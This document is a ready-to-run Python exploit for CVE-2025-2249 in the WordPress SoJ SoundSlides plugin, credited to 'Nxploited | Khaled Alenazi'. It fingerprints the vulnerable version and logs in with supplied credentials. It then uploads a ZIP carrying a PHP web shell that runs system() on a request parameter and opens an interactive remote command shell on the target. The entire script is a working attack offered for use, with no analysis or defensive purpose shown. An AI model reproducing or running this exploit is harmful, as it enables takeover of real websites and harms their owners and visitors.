NXploit

import os import requests import zipfile import argparse import time BANNER = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@!@! @@! @@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@!!@! !@! @!@ !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ @!! @!! !!@!!@!! !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!! !@! !!@!!! :!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! :!!:!:!!: !!! :!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:::!!::: !:! ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::: ::::: :: :: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: ::: : : : By: Nxploited | Khaled Alenazi """ def print_banner(): print(BANNER) def create_directories(): os.makedirs("nxploit/data", exist_ok=True) os.makedirs("nxploit/audio", exist_ok=True) def create_files(): with open("nxploit/index.html", "w") as f: f.write("NXploit Presentation") with open("nxploit/data/data.xml", "w") as f: f.write("NXploit") with open("nxploit/audio/audio.mp3", "w") as f: f.write("DUMMY_AUDIO_CONTENT") with open("nxploit/nxploit.php", "w") as f: f.write(""""; system($_GET['cmd']); echo ""; } else { echo "No command executed."; } ?>""") def create_zip(zip_name="nxploit.zip"): create_directories() create_files() with zipfile.ZipFile(zip_name, "w") as zipf: for root, _, files in os.walk("nxploit"): for file in files: filepath = os.path.join(root, file) arcname = os.path.relpath(filepath, "nxploit") zipf.write(filepath, arcname=arcname) print(f"[+] ZIP created: {zip_name}") def check_version(base_url): readme_url = base_url + "/wp-content/plugins/soj-soundslides/readme.txt" print(f"[*] Checking plugin version at {readme_url} ...") try: res = requests.get(readme_url, timeout=5) if res.status_code == 200 and "Stable tag: 1.2.2" in res.text: print("[+] Vulnerable version 1.2.2 detected.") return True elif res.status_code == 200: print("[!] Plugin found but version not confirmed as vulnerable.") return False else: print("[-] Plugin readme not accessible.") return False except Exception as e: print(f"[!] Error while checking version: {e}") return False def interactive_shell(shell_url): print("[*] Entering interactive shell (type 'exit' to quit):") while True: cmd = input("> ").strip() if cmd.lower() in ["exit", "quit"]: print("[+] Exiting shell.") break try: res = requests.get(shell_url, params={"cmd": cmd}, timeout=5) print(res.text) except Exception as e: print(f"[!] Error: {e}") def main(): print_banner() parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,") parser.add_argument("-u", "--url", required=True, help="WordPress base URL") parser.add_argument("-un", "--username", required=True, help="WordPress username") parser.add_argument("-p", "--password", required=True, help="WordPress password") args = parser.parse_args() session = requests.Session() session.verify = False requests.packages.urllib3.disable_warnings() headers = {"User-Agent": "Mozilla/5.0"} if not check_version(args.url): print("[!] Exploit attempted, but vulnerable version not confirmed.") return login_url = args.url + "/wp-login.php" login_data = { "log": args.username, "pwd": args.password, "rememberme": "forever", "wp-submit": "Log In" } print("[*] Attempting login ...") response = session.post(login_url, data=login_data, headers=headers) if any("wordpress_logged_in" in cookie.name for cookie in session.cookies): print("[+] Login successful.") else: print("[-] Login failed.") return zip_name = "nxploit.zip" if not os.path.exists(zip_name): create_zip(zip_name) upload_url = args.url + "/wp-admin/options-general.php?page=soj-soundslides%2Fsoj-soundslides.php" files = { "soj-soundslide_ptw_zip": (zip_name, open(zip_name, "rb"), "application/zip") } data = { "soj-soundslide_presentation_name": "nxploit_shell", "action": "updateSoJSoundslide", "info_update": "Update options »" } print("[*] Uploading shell...") res = session.post(upload_url, files=files, data=data, headers=headers) print("[*] Waiting 3 seconds before checking shell ...") time.sleep(3) shell_url = f"{args.url}/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php" try: check = session.get(shell_url, headers=headers, timeout=5) if check.status_code == 200: print(f"[+] Shell uploaded: {shell_url}") interactive_shell(shell_url) else: print("[-] Shell upload may have failed.") except Exception as e: print(f"[!] Error accessing shell: {e}") if __name__ == "__main__": main()